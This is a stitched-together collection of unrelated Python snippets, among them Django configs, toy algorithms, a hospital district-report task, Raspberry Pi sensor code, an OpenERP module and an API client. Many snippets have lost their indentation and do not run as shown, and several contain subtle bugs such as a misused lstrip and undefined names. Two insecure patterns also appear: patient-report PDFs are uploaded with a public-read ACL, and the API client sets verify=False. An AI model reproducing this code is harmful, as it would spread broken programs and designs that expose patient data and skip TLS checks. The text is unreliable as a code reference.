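# same recurrence (defined here for illustration only, not called) could look like:
from functools import lru_cache

@lru_cache(maxsize=None)
def PP_memo(i, j):
    if i >= j or isPalindrome(s, i, j):
        return 0
    return min(PP_memo(i, k) + PP_memo(k + 1, j) + 1 for k in range(i, j))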
|
from django.conf.urls import patterns, include, url
import session_csrf
session_csrf.monkeypatch()
from django.contrib import admin
admin.autodiscover()
from django.views.decorators.cache import cache_page
from blog.views import IndexView
from blog.views import PostView
urlpatterns = patterns('',
# Examples:
url(r'^$', view=IndexView.as_view(), name='index', kwargs={"page_num": "1"}),
# url(r'^$', cache_page(24*60*60)(IndexView.as_view()), name='index'),
url(r'^page/(?P<page_num>[0-9]+)/$', IndexView.as_view(), name='page'),
# url(r'^(?P<year>[0-9]{4})/(?P<month>[0-9]{2})/(?P<day>[0-9]{2})/(?P<url_slug>[\w\W]+)/$', cache_page(24*60*60)(PostView.as_view()), name='post'),
url(r'^(?P<year>[0-9]{4})/(?P<month>[0-9]{2})/(?P<day>[0-9]{2})/(?P<url_slug>[\w\W]+)/$', PostView.as_view(), name='post'),
# url(r'^blog/', include('blog.urls')),
url(r'^_ah/', include('djangae.urls')),
# Note that by default this is also locked down with login:admin in app.yaml
url(r'^admin/', include(admin.site.urls)),
# url(r'^csp/', include('cspreports.urls')),
url(r'^auth/', include('djangae.contrib.gauth.urls')),
)
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__)))
del os
del sys
# from system import *
from _statistics import *
from _trig import *
from _basic import *
from _specialf import *
|
import turtle
turtle.pendown()
turtle.forward(100)
turtle.right(90)
turtle.forward(100)
turtle.right(90)
turtle.forward(100)
turtle.right(90)
turtle.forward(100)
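# Equivalent loop form of the square above (illustrative only, left commented out
# so it does not redraw the shape):
# for _ in range(4):
#     turtle.forward(100)
#     turtle.right(90)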
|
"""
Author: Nemanja Rakicevic
Date : January 2018
Description:
Load a model from the experiment directory and evaluate it on a
user defined test.
"""
import sys
import json
import logging
import argparse
import informed_search.tasks.experiment_manage as expm
def load_metadata(datapath):
"""Extract class experiment metadata."""
with open(datapath + '/experiment_metadata.json', 'r') as f:
args_dict = json.load(f)
return args_dict
def main_test(load_path, verbose, render):
"""Run model evaluation on test targets."""
load_task_kwargs = load_metadata(load_path)
load_task_kwargs.update(dict(render=render, verbose=verbose))
experiment = expm.ExperimentManager(
load_task_kwargs,
load_model_path=load_path)
# Allow evaluation of multiple test positions
while True:
# Input target position
while True:
try:
angle_s, dist_s = input(
"\nEnter TARGET: angle [deg], distance[m] >> ").split(",")
test_target = [float(angle_s), float(dist_s)]
break
except Exception as i:
print(i)
continue
# Evaluate given test position
_, _, test_stats = experiment.evaluate_single_test(test_target)
# Print outcome info
print("{} TEST TARGET (angle: {}; distance: {}) {}"
"\n - Trial outcome: {} [{}]; ball ({:4.2f},{:4.2f})"
"\n - Model polar error: {:4.2f}"
"\n - Euclidian error: {:4.2f}"
"\n - Polar error norm: {:4.2f}\n{}".format(
'-' * 7, angle_s, dist_s, '-' * 7,
test_stats['trial_outcome'], test_stats['fail_status'],
*test_stats['ball_polar'],
test_stats['model_polar_error'],
test_stats['euclid_error'],
test_stats['polar_error'], '-' * 50))
# Continue or exit
if input("\nEXECUTION DONE. "
"Enter to try again, or (q) to quit ") == 'q':
break
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-load', '--load_path',
default=None, required=True,
help="Path to the learned model file.")
parser.add_argument('-r', '--render',
default=False,
help="Show execution.")
parser.add_argument('-v', '--verbose',
default=0,
type=int,
help="Define verbose level\n"
"0: basic info\n"
"1: training - trial info\n"
"2: testing - parameter selection info\n"
"3: training and testing detailed info\n")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)-40s '
'%(levelname)-8s %(message)s',
handlers=[
logging.FileHandler(
'{}/test_target.log'.format(args.load_path)),
logging.StreamHandler()])
main_test(
load_path=args.load_path, render=args.render, verbose=args.verbose)
|
# -*- coding: utf-8 -*-
class MergeSort(object):
    def __init__(self, items):
        self.items = list(items)
    def sort(self):  # split in half, sort each half recursively, then merge
        if len(self.items) <= 1:
            return self.items
        mid = len(self.items) // 2
        return self.merge(MergeSort(self.items[:mid]).sort(), MergeSort(self.items[mid:]).sort())
    def merge(self, left, right):
        merged = []
        while left and right:
            merged.append(left.pop(0) if left[0] <= right[0] else right.pop(0))
        return merged + left + right
|
#!/usr/bin/python3
# variables.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
#creates a tuple, immutable
x = (1,2,3)
print(type(x), x)
#can get each of the elements in an object
for i in x:
print(i,end=", ")
print('\n')
#creates a list, mutable
y =[1,2,3]
y.insert(0,"FIRST!!")
y.append(5)
print(type(y),y)
s = 'string'
print(type(s),s[2:])
if __name__ == "__main__": main()
|
# Generated by Django 2.2.1 on 2019-07-10 12:46
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('notice', '0002_auto_20190710_2125'),
]
operations = [
migrations.RemoveField(
model_name='notice',
name='file',
),
]
|
import json,operator
from getting_old import imageProcess
from text_sentiment import textProcess
#format ['12312312',{'sad':'0.8'},{'angry':0.4}] ,['12312300',{'happy':'0.7'},{'surprise':0.2}] ,['12312310',{'disgust':'0.9'},{'angry':0.1}]]
from twitter import getTweets
import pickle
net_tweets=[]
def get_json(username):
json=getTweets(username,20)
tweet_all=[]
net_emotions_media=[]
for each_tweet in json:
emotions=None
if (each_tweet[2]!=''):
sentiment_image=imageProcess(each_tweet[2])
emotions=sentiment_image.get_emotions()
net_tweets.append(each_tweet[0])
sentiment_text=textProcess(each_tweet[0])
text_emotions=sentiment_text.get_json()
if text_emotions==None and emotions != None:
lists=emotions
elif emotions==None and text_emotions!= None:
lists=text_emotions
elif text_emotions == None and emotions==None:
lists=None
else:
lists= {key: emotions[key] + (9*text_emotions.get(key, 0)/3) for key in emotions.keys()}
print "***********"
print each_tweet[0]
if lists!=None:
lists=(sorted(lists.items(), key=operator.itemgetter(1),reverse=True))
lists=dict((x,y) for x,y in lists[:2])
print lists
net_emotions_media.append([each_tweet[1],lists])
#tweet_all.append(each_tweet[1],sentiment_text)
with open('outfile1', 'wb') as fp:
pickle.dump(net_tweets, fp)
return net_emotions_media
|
import numpy as np
start = 143
stop = 10000
n = np.arange(start, stop)
triangle = n*(n+1)/2
pentagon = n*(3*n-1)/2
hexagon = n*(2*n-1)
temp = [i for i in triangle if i in pentagon and i in hexagon]
print(temp)
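# --- Hedged alternative sketch (not part of the original solution) ---
# Every hexagonal number is also triangular (H_n = T_{2n-1}), so it is enough to test the
# hexagonal numbers for pentagonality: x is pentagonal iff (1 + sqrt(24x + 1)) / 6 is an integer.
def is_pentagonal(x):
    k = (1 + (24 * x + 1) ** 0.5) / 6
    return k == int(k)

print([h for h in hexagon if is_pentagonal(h)])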
|
from lol_sift.features_utils import find_champion_in_picture
from lol_sift.lol_window_utils import (
select_lol_window,
get_champion_select_image,
click_champion_select,
)
|
import enum
import time
from datetime import timedelta
from uuid import uuid4
import boto3
from celery.decorators import periodic_task
from celery.schedules import crontab
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.utils.timezone import localtime, now
from hardcopy import bytestring_to_pdf
from care.facility.models.patient import PatientRegistration
from care.facility.models.patient_base import CATEGORY_CHOICES
from care.facility.models.shifting import SHIFTING_STATUS_CHOICES, ShiftingRequest
from care.users.models import District, State, User
from care.utils.whatsapp.send_media_message import generate_whatsapp_message
@periodic_task(run_every=crontab(minute="0", hour="8"))
def run_scheduled_district_reports():
AdminReports(AdminReportsMode.DISTRICT).generate_reports()
class InvalidModeException(Exception):
pass
class UploadNotSupported(Exception):
pass
class AdminReportsMode(enum.Enum):
STATE = "State"
DISTRICT = "District"
class AdminReports:
mode = None
filter_field = ""
unique_object_ids = []
start_date = None
end_date = None
def fetch_unique_districts(self) -> None:
self.unique_object_ids = list(
User.objects.filter(user_type=User.TYPE_VALUE_MAP["DistrictAdmin"], district__isnull=False)
.values_list("district_id", flat=True)
.distinct()
)
def fetch_unique_states(self) -> None:
self.unique_object_ids = list(
User.objects.filter(user_type=User.TYPE_VALUE_MAP["StateAdmin"], state__isnull=False)
.values_list("state_id", flat=True)
.distinct()
)
def __init__(self, mode) -> None:
self.mode = mode
if mode == AdminReportsMode.DISTRICT:
self.filter_field = "district_id"
self.fetch_unique_districts()
elif mode == AdminReportsMode.STATE:
self.filter_field = "state_id"
self.fetch_unique_states()
else:
raise InvalidModeException
self.start_date = (localtime(now()) - timedelta(days=1)).replace(hour=0, minute=0, second=0, microsecond=0)
self.end_date = self.start_date + timedelta(days=1)
def get_object_name(self, object_id):
if self.mode == AdminReportsMode.STATE:
return State.objects.get(id=object_id).name
elif self.mode == AdminReportsMode.DISTRICT:
return District.objects.get(id=object_id).name
def upload_file(self, file_name):
if not settings.USE_S3:
raise UploadNotSupported()
file_path = default_storage.path(file_name)
with open(file_path, "rb") as f:
file_content = f.read()
s3Client = boto3.client(
"s3",
region_name="ap-south-1",
aws_access_key_id=settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
)
key = "reports/" + str(uuid4()) + str(int(time.time())) + ".pdf"
s3Client.put_object(
Bucket=settings.AWS_STORAGE_BUCKET_NAME,
Key=key,
Body=file_content,
ContentType="application/pdf",
ACL="public-read",
)
return f"https://{settings.AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/{key}"
# Summary Functions
def calculate_patient_summary(self, base_filters):
return_dict = {}
base_queryset = PatientRegistration.objects.filter(**base_filters)
return_dict["current_active"] = base_queryset.filter(is_active=True).count()
return_dict["created_today"] = base_queryset.filter(
is_active=True, created_date__gte=self.start_date, created_date__lte=self.end_date
).count()
return_dict["discharged_today"] = base_queryset.filter(
is_active=False,
last_consultation__discharge_date__gte=self.start_date,
last_consultation__discharge_date__lt=self.end_date,
).count()
return return_dict
def caluclate_patient_age_summary(self, base_filters):
return_list = []
base_queryset = PatientRegistration.objects.filter(**base_filters)
age_brakets = [(0, 20), (20, 40), (40, 60), (60, 80), (80, 120)]
for braket in age_brakets:
count = base_queryset.filter(
is_active=True,
created_date__gte=self.start_date,
created_date__lte=self.end_date,
age__gte=braket[0],
age__lt=braket[1],
).count()
return_list.append({"total_count": count, "title": f"{braket[0]}-{braket[1]}"})
return return_list
def caluclate_patient_category_summary(self, base_filters):
return_list = []
base_queryset = PatientRegistration.objects.filter(**base_filters)
for category in CATEGORY_CHOICES:
count = base_queryset.filter(
is_active=True,
created_date__gte=self.start_date,
created_date__lte=self.end_date,
last_consultation__category=category[0],
).count()
return_list.append({"total_count": count, "title": category[1]})
return return_list
def calculate_shifting_summary(self, base_filters):
return_dict = {}
base_queryset = ShiftingRequest.objects.filter(**base_filters)
today_queryset = base_queryset.filter(created_date__gte=self.start_date, created_date__lte=self.end_date)
return_dict["total_up"] = today_queryset.filter(is_up_shift=True).count()
return_dict["total_down"] = today_queryset.filter(is_up_shift=False).count()
return_dict["total_count"] = return_dict["total_up"] + return_dict["total_down"]
return return_dict
def calculate_shifting_status_summary(self, base_filters):
return_list = []
base_queryset = ShiftingRequest.objects.filter(**base_filters)
today_queryset = base_queryset.filter(created_date__gte=self.start_date, created_date__lte=self.end_date)
for status in SHIFTING_STATUS_CHOICES:
total = today_queryset.filter(status=status[0]).count()
emergency = today_queryset.filter(status=status[0], emergency=True).count()
return_list.append({"total_count": total, "emergency_count": emergency, "status": status[1]})
return return_list
def generate_report_data(self, object_id):
final_data = {}
base_filters = {self.filter_field: object_id}
shifting_base_filter = {"patient__" + self.filter_field: object_id}
final_data["patients_summary"] = self.calculate_patient_summary(base_filters)
final_data["patients_age"] = self.caluclate_patient_age_summary(base_filters)
final_data["patients_categories"] = self.caluclate_patient_category_summary(base_filters)
final_data["shifting_summary"] = self.calculate_shifting_summary(shifting_base_filter)
final_data["shifting_status"] = self.calculate_shifting_status_summary(shifting_base_filter)
return final_data
def generate_reports(self):
for object_id in self.unique_object_ids:
data = self.generate_report_data(object_id)
data["object_type"] = self.mode.value
object_name = self.get_object_name(object_id)
data["object_name"] = object_name
data["current_date"] = str(self.start_date.date())
html_string = render_to_string("reports/daily_report.html", data)
file_name = str(int(round(time.time() * 1000))) + str(object_id) + ".pdf"
bytestring_to_pdf(
html_string.encode(),
default_storage.open(file_name, "w+"),
**{
"no-margins": None,
"disable-gpu": None,
"disable-dev-shm-usage": False,
"window-size": "2480,3508",
},
)
self.send_reports(object_name, {self.filter_field: object_id}, file_name)
default_storage.delete(file_name)
def send_email_report(self, object_name, file_name, user):
if not user.email:
return
file = default_storage.open(file_name, "rb")
msg = EmailMessage(
f"Care Summary : {self.mode.value} {object_name} : {self.start_date.date()}",
"Please find the attached report",
settings.DEFAULT_FROM_EMAIL,
(user.email,),
)
msg.content_subtype = "html"
msg.attach(f"{self.mode.value}Report.pdf", file.read(), "application/pdf")
msg.send()
def send_whatsapp_report(self, object_name, public_url, user):
if not user.alt_phone_number:
return
generate_whatsapp_message(object_name, public_url, user.alt_phone_number)
def send_reports(self, object_name, base_filters, file_name):
users = User.objects.all()
if self.mode == AdminReportsMode.STATE:
users = users.filter(user_type=User.TYPE_VALUE_MAP["StateAdmin"], **base_filters)
elif self.mode == AdminReportsMode.DISTRICT:
users = users.filter(user_type=User.TYPE_VALUE_MAP["DistrictAdmin"], **base_filters)
try:
public_url = self.upload_file(file_name)
except UploadNotSupported:
public_url = None
for user in users:
self.send_email_report(object_name, file_name, user)
if public_url:
self.send_whatsapp_report(object_name, public_url, user)
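# Added sketch (standalone helper, not part of the original class): upload_file above returns a
# virtual-hosted-style S3 URL; this mirrors just that naming convention so the format can be
# checked without boto3 or Django settings.
def build_s3_report_url(bucket_name, key):
    # e.g. build_s3_report_url("my-bucket", "reports/abc.pdf")
    #      -> "https://my-bucket.s3.amazonaws.com/reports/abc.pdf"
    return f"https://{bucket_name}.s3.amazonaws.com/{key}"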
|
from PIL import Image
from six import BytesIO
def image_from_bytes(bytes_):
return Image.open(BytesIO(bytes_))
def png_format(image):
bytes_ = BytesIO()
image.save(bytes_, 'PNG')
return bytes_.getvalue()
class ScreenshotFromPngBytes(object):
def __init__(self, png_bytes):
self._png_bytes = png_bytes
def as_image(self):
return image_from_bytes(self._png_bytes)
def as_png_bytes(self):
return self._png_bytes
class ScreenshotFromImage(object):
def __init__(self, image):
self._image = image
def as_image(self):
return self._image.copy()
def as_png_bytes(self):
return png_format(self._image)
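# Usage sketch (added): the two wrappers are interchangeable -- both expose as_image() and
# as_png_bytes() -- so a round trip through PNG bytes yields an equivalent screenshot object.
if __name__ == "__main__":
    img = Image.new("RGB", (4, 4), color="red")
    shot = ScreenshotFromImage(img)
    shot2 = ScreenshotFromPngBytes(shot.as_png_bytes())
    print(shot2.as_image().size)  # -> (4, 4)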
|
'''
@Author: Fallen
@Date: 2020-04-03 13:51:25
@LastEditTime: 2020-04-03 14:06:49
@LastEditors: Please set LastEditors
@Description: Determine the file type from its name using string methods
@FilePath: \day02\字符串判断文件类型练习.py
'''
'''
Exercise:
Given a path, upload a file (a text file .txt or an image .jpg/.png).
If the file is not in an accepted format, let the user pick another file;
if it matches the upload rules, report that the upload succeeded.
'''
# "Allow retries" means a loop -- usually an infinite loop with an exit condition -- so wrap it in a function
def upfilePic():
    while True:
        path = input("Please choose a file: ")  # e.g. "D:\pictures\background.jpg"
        p = path.rfind("\\")
        filename = path[p+1:]
        if filename.endswith("jpg") or filename.endswith("png") or filename.endswith("bmp"):
            print("It is an image, upload allowed.")
            break
        else:
            a = input("Wrong format. Pick another file? (yes/no): ")
            if a.lower() == "yes":
                continue
            if a.lower() == "no":
                break
            else:
                print("Please answer yes or no.")
                continue
# call the function
upfilePic()
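# Alternative sketch (my addition, not part of the original exercise): the same extension check
# using os.path.splitext, which avoids slicing the path by hand and is case-insensitive.
import os

def is_allowed_image(path, allowed=(".jpg", ".png", ".bmp")):
    # splitext returns ("name", ".ext"); lower() makes the comparison case-insensitive
    return os.path.splitext(path)[1].lower() in allowed

# Example: is_allowed_image("D:\\pictures\\background.JPG") -> True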
|
a =(ord("0"))
print(a)
print(ord("c"))
print(ord("&"))
|
# missed solution completely. needed help.
class Solution(object):
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
        contains_one = False
        num_len = len(nums)
        # pass 1: the answer can only be in 1..n+1, so first check whether 1 is present at all
        for i in range(num_len):
            if nums[i] == 1:
                contains_one = True
        if not contains_one:
            return 1
        if (num_len == 1):
            return 2
        # pass 2: values outside 1..n can never be the answer, so overwrite them with 1
        for i in range(num_len):
            if (nums[i] > num_len or nums[i] <= 0):
                nums[i] = 1
        # pass 3: use the index as a hash -- mark value x as seen by making nums[x-1] negative
        for i in range(num_len):
            x = abs(nums[i])
            if (nums[x-1] > 0):
                nums[x-1] *= -1
        # pass 4: the first index still positive was never seen, so index + 1 is the answer
        for i in range(num_len):
            if (nums[i] > 0):
                return i + 1
        return num_len + 1
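# Usage sketch (added for illustration): a few quick checks of the expected outputs.
if __name__ == "__main__":
    s = Solution()
    print(s.firstMissingPositive([1, 2, 0]))      # -> 3
    print(s.firstMissingPositive([3, 4, -1, 1]))  # -> 2
    print(s.firstMissingPositive([7, 8, 9, 11]))  # -> 1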
|
#-*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
so = 0
trig = 12
echo = 26
GPIO.setup(trig, GPIO.OUT)
GPIO.setup(echo, GPIO.IN)
def sendsonic(dis):
so = 0
if dis < 8:
so = 1
elif 8 <= dis < 16:
so = 2
elif 16 <= dis < 24:
so = 3
elif 24 <= dis < 32:
so = 4
elif 32 <= dis:
so = 5
return so
def presonic():
GPIO.setup(trig, GPIO.OUT)
GPIO.setup(echo, GPIO.IN)
    GPIO.output(trig, False)  # keep the trig pin low
def printsonic():
    GPIO.output(trig, False)  # keep the trig pin low
    ## drive trig high to send the ultrasonic burst; hold it for about 10 microseconds
    GPIO.output(trig, True)
    time.sleep(0.00001)
    GPIO.output(trig, False)
    while GPIO.input(echo) == False:  # timestamp while echo is still low
        pulse_start = time.time()
    while GPIO.input(echo) == True:  # timestamp while echo stays high
        pulse_end = time.time()
    pulse_duration = pulse_end - pulse_start  # time echo stayed high (proportional to distance)
    distance = pulse_duration * 17000
    distance = round(distance, 2)
    ## rounded to two decimal places
print("Distance : ", distance, "cm")
print("send : ",sendsonic(distance))
return sendsonic(distance)
GPIO.cleanup()
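# Usage sketch (added; assumes the wiring above): re-assert the pin mode, prime the pins,
# then poll the sensor roughly twice a second until Ctrl+C.
if __name__ == "__main__":
    try:
        GPIO.setmode(GPIO.BCM)
        presonic()
        while True:
            printsonic()
            time.sleep(0.5)
    except KeyboardInterrupt:
        GPIO.cleanup()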
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 28 21:33:25 2017
@author: Akhil
"""
#!/usr/bin/python
#===============================================
# image_manip.py
#
# some helpful hints for those of you
# who'll do the final project in Py
#
# bugs to vladimir dot kulyukin at usu dot edu
#===============================================
import argparse
import cv2
import os
import numpy as np
import pickle
# two lists of images; each image is read with cv2 and
# scaled to [0, 1] as a numpy array.
TRAIN_IMAGE_DATA = []
TEST_IMAGE_DATA = []
# the train target holds one label per train image: 1 = single bee, 0 = no bee
TRAIN_TARGET = []
# the test target holds one label per test image
TEST_TARGET = []
### Global counters for train and test samples
NUM_TRAIN_SAMPLES = 0
NUM_TEST_SAMPLES = 0
## define the root directory
ROOT_DIR = 'C:/Users/Akhil/OneDrive - aggiemail.usu.edu/Akhil/Fall 2017/TOC/nn_train/'
## read the single bee train images
YES_BEE_TRAIN = ROOT_DIR + 'single_bee_train'
for root, dirs, files in os.walk(YES_BEE_TRAIN):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
TRAIN_IMAGE_DATA.append(img)
TRAIN_TARGET.append(int(1))
NUM_TRAIN_SAMPLES +=1
## read the single bee test images
YES_BEE_TEST = ROOT_DIR + 'single_bee_test'
for root, dirs, files in os.walk(YES_BEE_TEST):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
# print img.shape
TEST_IMAGE_DATA.append(img)
TEST_TARGET.append(int(1))
NUM_TEST_SAMPLES += 1
## read the no-bee train images
NO_BEE_TRAIN = ROOT_DIR + 'no_bee_train'
for root, dirs, files in os.walk(NO_BEE_TRAIN):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
TRAIN_IMAGE_DATA.append(img)
TRAIN_TARGET.append(int(0))
NUM_TRAIN_SAMPLES += 1
# read the no-bee test images
NO_BEE_TEST = ROOT_DIR + 'no_bee_test'
for root, dirs, files in os.walk(NO_BEE_TEST):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
TEST_IMAGE_DATA.append(img)
TEST_TARGET.append(int(0))
NUM_TEST_SAMPLES += 1
print (NUM_TRAIN_SAMPLES)
print (NUM_TEST_SAMPLES)
TRAIN_IMAGE_DATA = np.asarray(TRAIN_IMAGE_DATA).astype(np.float32)
TEST_IMAGE_DATA = np.asarray(TEST_IMAGE_DATA).astype(np.float32)
TRAIN_TARGET = np.asarray(TRAIN_TARGET).astype(np.float32)
TEST_TARGET = np.asarray(TEST_TARGET).astype(np.float32)
with open("C:/Users/Akhil/OneDrive - aggiemail.usu.edu/Akhil/Fall 2017/TOC/nn_train/output.dat","wb") as f:
pickle.dump(TRAIN_IMAGE_DATA, f)
pickle.dump(TEST_IMAGE_DATA, f)
pickle.dump(TRAIN_TARGET,f)
pickle.dump(TEST_TARGET,f)
######################################
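# Sanity-check sketch (added): read the pickles back in the same order they were dumped
# and confirm the array shapes match what was written.
with open(ROOT_DIR + 'output.dat', 'rb') as f:
    train_x = pickle.load(f)
    test_x = pickle.load(f)
    train_y = pickle.load(f)
    test_y = pickle.load(f)
print(train_x.shape, train_y.shape)
print(test_x.shape, test_y.shape)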
|
# Numeric types
entero = 7
decimal = 7.5
otroDecimal = 7.0
otroDecimal = float(7.02)
# Strings
cadenaS = 'Holi'
cadenaC = "Boli"
cadenaS2 = "I'm Pato de Turing"
pruebaUno = cadenaS+" "+ cadenaC+""+str(decimal)
pruebaDos = entero + decimal
print(pruebaDos)
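# Added note (illustrative): mixing a string with a number needs an explicit str() cast,
# which is why pruebaUno concatenates str(decimal); type() shows what each expression produced.
print(pruebaUno)
print(type(pruebaUno), type(pruebaDos))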
|
# This module gathers the functions used to plot the results graphically
import matplotlib.pyplot as py
def print_instance(inst):
dep = inst[0]
cust = inst[1:]
py.plot(dep[0], dep[1], color='blue', marker='o')
for i in cust:
py.plot(i[0], i[1], color='red', marker='o')
def print_route(route, inst, c):
x = []
y = []
for i in range(len(route)):
x.append(inst[route[i]][0])
y.append(inst[route[i]][1])
x.append(inst[route[0]][0])
y.append(inst[route[0]][1])
py.plot(x, y, label="route" + str(c))
def print_solution(routes, inst):
print_instance(inst)
c = 1
for i in routes:
print_route(i, inst, c)
c += 1
def print_edges(edges, inst, col):
for e in edges:
x = [inst[e[0]][0], inst[e[1]][0]]
y = [inst[e[0]][1], inst[e[1]][1]]
py.plot(x, y, color=col)
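# Usage sketch (added; hypothetical data): the first point of `inst` is the depot, the rest
# are customers, and each route is a list of indices into `inst`.
if __name__ == "__main__":
    inst = [(0, 0), (2, 3), (5, 1), (-1, 4), (3, -2)]
    routes = [[0, 1, 3], [0, 2, 4]]
    print_solution(routes, inst)
    py.legend()
    py.show()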
|
"""
TECHX API GATEWAY
GENERIC WORKER CLASS FOR API CALLS TO EXTERNAL SERVICES
CREATED BY: FRBELLO AT CISCO DOT COM
DATE : JUL 2020
VERSION: 1.0
STATE: RC2
"""
__author__ = "Freddy Bello"
__author_email__ = "frbello@cisco.com"
__copyright__ = "Copyright (c) 2016-2020 Cisco and/or its affiliates."
__license__ = "MIT"
# ====== Libraries =========
import json
import logging
import requests
# ===== APIGW Libraries =======
# ==== Create a Logger ===
logger = logging.getLogger("apigw.APIGWorker")
# ==== Class Blueprint ===
class APIGWorker:
"""
Base Worker for API Calls operation
"""
def __init__(self, api_url):
self.__name__ = "APIGW Worker"
self.api_url = api_url
logger.info("APIGW Ready : %s", self.__name__)
def query_api(self, api_endpoint, api_headers):
"""
APIGW Worker API Caller
params:
api_enpoint = The URI call like /v1/dasdasd
api_method = GET,POST,PUT,PATCH,DELETE
api_headers = Any custom header
return:
a JSON Response
"""
url = self.api_url + api_endpoint
headers = api_headers
try:
rx_answer = requests.get(url, headers=headers, verify=False)
resp = json.loads(rx_answer.text)
logger.info("APIGW Worker request completed sucessfully")
except requests.exceptions.RequestException as err:
logger.error("APIGW Worker request failed : %s", err)
resp = {}
return resp
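# Usage sketch (added; the URL and header values are placeholders, not a real service):
# point the worker at a base URL and query one endpoint.
if __name__ == "__main__":
    worker = APIGWorker("https://api.example.com")
    data = worker.query_api("/v1/status", {"Accept": "application/json"})
    print(data)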
|
from functools import reduce
from operator import iconcat
from collections import Counter
from babybertsrl import configs
MODEL_NAME = 'childes-20191206'
# load model-based annotations
srl_path = configs.Dirs.data / 'training' / f'{MODEL_NAME}_no-dev_srl.txt'
text = srl_path.read_text()
lines = text.split('\n')[:-1]
# get a list of all tags
tag_lines = [line.split('|||')[1].split() for line in lines]
tags = reduce(iconcat, tag_lines, []) # flatten list of lists
print(f'num tags={len(tags):>9,}')
# remove "B-" and "I-"
tags_no_bio = [tag.lstrip('B-').lstrip('I-') for tag in tags]
# count
t2f = Counter(tags_no_bio)
for t, f in sorted(t2f.items(), key=lambda i: i[1]):
print(f'{t:<12} occurs {f:>9,} times')
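# Format sketch (added; the example line is illustrative, not taken from the corpus): each line
# is expected to hold the tokens and the SRL tags separated by "|||", which is what
# split('|||') above relies on.
example = "the dog chased the cat ||| B-ARG0 I-ARG0 B-V B-ARG1 I-ARG1"
print(example.split('|||')[1].split())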
|
# Generated by Django 2.1.4 on 2018-12-19 11:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contacts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='名字')),
('email', models.EmailField(max_length=100, verbose_name='邮箱')),
('subject', models.CharField(max_length=100, verbose_name='主题')),
('message', models.TextField(verbose_name='信息')),
('created_time', models.DateTimeField(auto_now=True, verbose_name='发送时间')),
],
),
]
|
# -*- encoding: utf-8 -*-
###########################################################################
# Module Written for OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
# Credits######################################################
# Coded by: Vauxoo C.A.
# Planned by: Nhomar Hernandez
# Audited by: Vauxoo C.A.
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from openerp.osv import osv, fields
class InheritPriceListItem(osv.Model):
    """Extend product.pricelist.item with a computed price, the parent
    price list and the version's date range."""
    def default_get(self, cr, uid, fields, context=None):
        '''Pre-fill the product and the price list version from the context.'''
if context is None:
context = {}
res = super(InheritPriceListItem, self).default_get(
cr, uid, fields, context=context)
res.update({'product_id': context.get('create_item', False)})
version = context.get('versions', False)
version and res.update({'price_version_id': version and version[0]
and version[0][2]
and version[0][2][0]})
return res
def _get_price_list(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
for item in self.browse(cr, uid, ids, context=context):
res[item.id] = item.price_version_id and \
item.price_version_id.pricelist_id and \
item.price_version_id.pricelist_id.id
return res
def _compute_price(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
pricelist_obj = self.pool.get('product.pricelist')
if context.get('product', False):
for item in self.browse(cr, uid, ids, context=context):
price = pricelist_obj.price_get(cr, uid,
[item.price_list_id and item.price_list_id.id],
context.get('product'), 1, context=context)
price = item.price_list_id and price.get(item.price_list_id.id)
res[item.id] = price
else:
for item in self.browse(cr, uid, ids, context=context):
if item.product_id:
price = pricelist_obj.price_get(cr, uid,
[item.price_list_id and item.price_list_id.id],
item.product_id.id, 1, context=context)
price = item.price_list_id and price.get(
item.price_list_id.id)
res[item.id] = price
elif item.product_active_id:
price = pricelist_obj.price_get(cr, uid,
[item.price_list_id and item.price_list_id.id],
item.product_active_id and
item.product_active_id.id,
1, context=context)
price = item.price_list_id and price.get(
item.price_list_id.id)
res[item.id] = price
return res
_inherit = 'product.pricelist.item'
_columns = {
        'price_list_id': fields.function(_get_price_list, method=True,
                                         type='many2one', relation='product.pricelist',
                                         string='Price List'),
'compute_price': fields.function(_compute_price, method=True,
type='float', string='Price'),
'price_version_id': fields.many2one('product.pricelist.version',
'Price List Version', required=True, select=True,
ondelete='cascade'),
'product_active_id': fields.many2one('product.product', 'product',
help='Product active to list price'),
'date_start': fields.related('price_version_id', 'date_start',
type='date', string='Date Start'),
'date_end': fields.related('price_version_id', 'date_end',
type='date', string='Date End'),
}
_defaults = {
'sequence': 1,
'base': 2,
}
def delete_record(self, cr, uid, ids, context=None):
if context is None:
context = {}
return ids and self.unlink(cr, uid, ids, context=context)
|